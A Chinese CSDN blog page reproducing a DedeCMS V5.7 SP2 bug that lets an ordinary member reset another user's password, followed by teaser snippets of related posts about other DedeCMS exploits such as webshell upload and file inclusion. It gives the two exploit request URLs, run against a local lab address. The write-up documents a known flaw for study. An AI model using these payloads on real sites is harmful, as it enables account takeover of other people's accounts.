dedecms漏洞复现+分析

最新推荐文章于 2024-08-04 01:03:52 发布

ring4ring

最新推荐文章于 2024-08-04 01:03:52 发布

阅读量1.2k

点赞数 1

分类专栏：漏洞复现

本文链接：https://blog.youkuaiyun.com/weixin_44897902/article/details/103846950

版权

漏洞复现专栏收录该内容

19 篇文章

订阅专栏

本文详细解析了DedeCMS V5.7 UTF8 SP2版本中存在的一处安全漏洞，允许普通用户通过特定Payload越权修改其他用户密码，展示了攻击流程并提供了关键步骤的截图。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

1.修改任意用户密码

首先注册两个用户，123，1234；在后台已知123的id为2，1234的id为3
登录1234，修改id为2的密码
payload：

/DedeCMS-V5.7-UTF8-SP2/uploads/member/resetpassword.php?dopost=safequestion&safequestion=0.0&safeanswer=&id=2

抓包可看到key
在这里插入图片描述此时key为62dlYmGv
payload

192.168.91.141/DedeCMS-V5.7-UTF8-SP2/uploads/member/resetpassword.php?dopost=getpasswd&id=2&key=62dlYmGv

可以看到，直接跳转到了123的密码找回界面
在这里插入图片描述并且登录成功
具体分析参见：这儿

2.普通用户越权

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

ring4ring

关注关注

1
点赞
踩
4

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

“DedeCMS存在的安全漏洞及编程解决方案“

HackSquad的博客

10-03

699

本文介绍了DedeCMS中常见的安全漏洞，包括SQL注入漏洞、文件上传漏洞和跨站脚本漏洞，并提供了相应的编程解决方案。在开发和使用DedeCMS时时，务必注意安全性，并采取适当的措施来防止这些漏洞的利用。在本文中，我们将详细介绍DedeCMS常见的安全漏洞，并提供相应的编程解决方案。为了防止文件上传漏洞，应该对上传的文件进行严格的验证和过滤。可以检查文件的扩展名、文件类型、文件大小等，并将上传的文件存储在一个独立的目录中，避免直接执行上传文件。为了防止跨站脚本漏洞，应该对用户输入的内容进行适当的转义。

【漏洞复现】DedeCMS存在文件包含漏洞导致后台getshell(CVE-2023-2928)

李火火的安全圈

05-31

4159

uploads/dede/article_allowurl_edit.php存在缺少对该文件中写入内容的任何过滤是导致该漏洞的因素之一，在5.7.106之前的DedeCMS中发现了一个漏洞。它已被宣布为关键。受此漏洞影响的是文件uploads/dede/article_allowurl_edit.php的未知功能。操纵参数allurls会导致代码注入。可以远程发起攻击获得网站控制权限。

参与评论您还未登录，请先登录后发表或查看评论

DedeCMS 未授权远程命令执行漏洞分析

Keepb1ue的博客

04-12

1455

DedeCMS是国内专业的PHP网站内容管理系统-织梦内容管理系统，采用XML名字空间风格核心模板：模板全部使用文件形式保存，对用户设计模板、网站升级转移均提供很大的便利，健壮的模板标签为站长DIY自己的网站提供了强有力的支持。高效率标签缓存机制：允许对同类的标签进行缓存，在生成 HTML的时候，有利于提高系统反应速度，降低系统消耗的资源。模型与模块概念并存：在模型不能满足用户所有需求的情况下，DedeCMS推出一些互动的模块对系统进行补充，尽量满足用户的需求。

dedecms 漏洞_DEDECMS伪随机漏洞分析

weixin_39998859的博客

11-29

341

一、本篇本文为“DEDECMS伪随机漏洞”系列第三篇，查看前两篇可点击底部【阅读原文】：第一篇：《DEDECMS伪随机漏洞分析 (一) PHP下随机函数的研究》第二篇：《DEDECMS伪随机漏洞分析 (二) cookie算法与key随机强度分析》根据第二篇,我们有信心去遍历root key的所有可能, 但是我们还需要一个碰撞点, 才能真正得到root key的值, 本篇找到了两个碰撞点...

【漏洞分析】DeDeCMS v5.7 SP2 正式版前台任意用户密码修改漏洞

qq_44655084的博客

12-11

2513

织梦内容管理系统(DedeCms)以简单、实用、开源而闻名，是国内最知名的 PHP 开源网站管理系统，也是使用用户最多的 PHP 类 CMS 系统，在经历多年的发展，目前的版本无论在功能，还是在易用性方面，都有了长足的发展和进步，DedeCms 免费版的主要目标用户锁定在个人站长，功能更专注于个人网站或中小型门户的构建，当然也不乏有企业用户和学校等在使用该系统。2018 年 1 月 10 日，锦行信息安全公众号公开了一个关于DeDeCMS前台任意用户密码修改漏洞的细节。

DeDeCMS漏洞

weixin_53198216的博客

08-03

301

4.在生成下选择更新主页HTML，将主页位置后缀改为php，首页模式选择生成静态，再点击更新主页HTML。2.选择模板下的默认模板管理，找到index.htm。7.打开蚁剑，输入网址和密码点击测试连接，显示成功。6.复制到地址栏访问，没有显示内容证明注入成功。3.对这个文件进行编辑写入一句话木马并保存。5.出现一个更新后的路径。

DedeCMS5.7远程文件包含漏洞分析

shelter1234567的博客

09-13

494

访问第二个payload,由于../data/admin/config_update.php为空 $updateHost失去了定义，可以被变量覆盖到， $rmurl = $updateHost."dedecms/demodata.{$s_lang}.txt";利用 $install_demo_name可控的方式将config_update.php 写入空让其中的$updateHost失去定义，写入空执行找不到对应的文件为空， $sql_content 自然就为空。如果业务还有以下代码。

dedecms注入漏洞 search.php,Dedecms最新注入漏洞分析及修复方法

weixin_35733151的博客

03-18

583

常见的CMS漏洞解析！

最新发布

muyuchen110的博客

08-04

2722

【代码】常见的CMS漏洞解析！

远程文件包含漏洞（dedecms5.7 sp1版本漏洞复现）

kid的博客

06-05

6223

远程文件包含漏洞（dedecms5.7 sp1版本漏洞复现）前言前面看一个视频提到这个漏洞的复现，自己觉得这种漏洞复现然后分析原因还是蛮有意思的，所以这里也来实现一下这个漏洞的复现，自己动手还是很重要的一个过程吧过程首先是搭建环境，phpstudy + dedecms5.7 sp1基本是一键安装漏洞原因主要是在install的index.php文件中 foreach(Array('_...

记录我悲惨的一天(漏洞复现12小时，一个未成功)

ArBitrarilyR的博客

06-21

1493

记录自己12小时失败的漏洞复现

dedecms手机站下一篇跳转bug

qq_36766004的博客

05-17

526

用的是DedeCMS-V5.7-UTF8-SP2上一篇下一篇代码在include/arc.archives.class.php，大概在839行左右 $mlink = 'view.php?aid='.$preRow['id'];应改成 $mlink = 'view.php?aid='.$nextRow['id'];不然点击下一篇跳转的id是上一篇的，当没有上一篇时，title有但是链接跳转的地址就不...

dede5.7 跳转view.php,DedeCMS V5.7 download.php url重定向漏洞解决方法

weixin_42515376的博客

03-31

324

360网站安全检测发现提示了一个漏洞——[警告]DedeCMS V5.7 download.php url重定向漏洞，该漏洞看文件也知道对应的是/plus/download.php这个文件！那么如何修复此漏洞呢？360网站安全给出的提示是升级到最新版本。。。或许升级确实有用，但是升级可能会对网站造成各种问题！例如标签调用，后台文件修改，如果做过二次开发就更不要轻易升级！所以只能对/plus/dow...

DedeCMS（CVE-2019-8933）

m0_74559567的博客

03-15

1329

密码就是在字典里面，但是我们发现并没有爆破成功，原因是请求过快，输入错误的时候网页会跳转错误页面然后再返回再次登录。查看源代码，找到验证码的url，当然也可以右键打开验证码链接，或者直接拖就可以。然后再次开始攻击，攻击完成后，排序长度，不一样的基本是成功的。返回Bp插件界面，然后右键导入模板，填入接口url。payload1的位置，添加常用的密码字典进行爆破。点击浏览，是可以被成功解析的，使用蚁剑进行连接。payload2位置，选择的是验证码的插件。抓包验证码的网页后，右键发送到插件。

织梦cms5.7 后台存在代码执行漏洞

qq_38947035的博客

04-02

1720

漏洞利用：在本地搭建织梦cms，默认的后台地址为域名/dede 因为后续的利用需要使用到token，然而登录成功后的数据包内并没有显示token值。所以需要访问如下链接获取token： http://192.168.137.131/dede/tpl.php?action=upload 访问后查看页面源代码，获取到token 然后访问： http://192.168.137.131/dede/...

dedecms v5.7越权漏洞复现

xxxMIng的博客

12-28

2168

环境搭建：在win7x64上安装phpstudy 将网站源码放置于C:\phpStudy\PHPTutorial\WWW\dedecms 并启动phpstudy 将运行模式放在系统服务上应用从物理机上访问该地址的index.php网页进行下一步继续设定数据密码为root 管理员登陆 admin 密码 admin 点击继续即可完成搭站 ...

DedeCMS V5.7 SP1远程任意文件写入漏洞(CVE-2015-4553)

末初 · mochu7

05-18

2708

文章目录漏洞原因漏洞影响版本漏洞原理分析漏洞复现漏洞原因 uploads/install/index.php中对于全局传参遍历的处理不当造成可进行变量覆盖，进而导致远程文件上传Getshell 漏洞影响版本 <= Dedecms V5.7 SP1的所有版本漏洞原理分析 uploads/install/index.php 对于全局传参遍历中的可变变量的写法${$_k}导致变量覆盖，RunMagicQuotes()每个参数的值进行了特殊字符转义处理继续分析 uploads/install/i

完美URL跳转漏洞

swordheart的博客

04-18

4683

漏洞详情披露状态： 2010-08-01：细节已通知厂商并且等待厂商处理中 2010-08-02：厂商已经确认，细节仅向厂商公开 2010-08-12：细节向核心白帽子及相关领域专家公开 2010-08-22：细节向普通白帽子公开 2010-09-01：细节向实习白帽子公开 2010-08-31：细节向公众公开简要描述：此漏洞是用于网络钓鱼攻击，让用户访问恶意网站而不自知。详细说明： Web应用程序接收到用户提交的URL参数后，没有对参数做“可信任URL”的验证，就向用户浏览

漏洞复现--织梦CMS_V5.7任意用户密码重置漏洞

HengMengSec的博客

08-16

2514

织梦内容管理系统（DeDeCMS）以其简单、实用、开源的特点而著名。作为国内最知名的PHP开源网站管理系统，它在多年的发展中取得了显著进步，无论在功能还是易用性方面都有长足的发展。该系统广泛应用于中小型企业门户网站、个人网站、企业和学习网站建设。在中国，DedeCMS被认为是最受欢迎的CMS系统之一。但是，最近发现该系统的一个漏洞位于member/resetpassword.php文件中。由于未对接收的参数safeanswer进行严格的类型判断，攻击者可以利用弱类型比较来绕过安全措施。

dedecms漏洞复现

03-28

由于 Dedecms 平台存在多个漏洞，以下是一个常见的 Dedecms 漏洞复现过程： 1. 扫描目标 Dedecms 站点，确定其版本号和漏洞类型。 2. 找到对应的漏洞利用代码，例如 Dedecms v5.7 SP2 sql注入漏洞利用代码： ``` ...